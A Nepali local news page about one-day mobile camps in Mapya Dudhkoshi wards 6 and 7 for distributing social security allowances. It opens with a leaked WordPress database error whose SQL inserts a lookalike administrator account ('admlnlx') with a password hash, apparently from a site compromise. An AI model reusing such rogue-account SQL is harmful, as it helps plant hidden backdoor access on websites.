WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWlfrwvKzl6XRUUX4DYdj2HQVyty0B0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 06:43:56', '', 'admlnlx', 'admlnlx')

माप्य ६ र ७ मा एकदिने घुम्ती शिबिर सन्चालन हुने – Gaule Khabar

माप्य ६ र ७ मा एकदिने घुम्ती शिबिर सन्चालन हुने

माप्य ६ र ७ मा एकदिने घुम्ती शिबिर सन्चालन हुने

सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका वडा ६ र ७ मा एक दिने घुम्ती शिबिर सन्चालन गर्ने ।

माप्य दुधकोशी ६ मा यहि जेस्ठ ५ गते शुक्रबार र माप्य ७ मा ६ गते शनिबार उक्त शिबिर सन्चालन गर्ने ६ नम्बर वडा अध्यक्ष राम प्रसाद मगरले जानकारी दिए ।

बिहान ८:०० बजेबाट बेलुका ५:०० बजेसम्म सन्चालन हुने एक दिने शिबिरमा सामाजिक शुरक्षा भत्ता वितरण गर्ने मगरले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका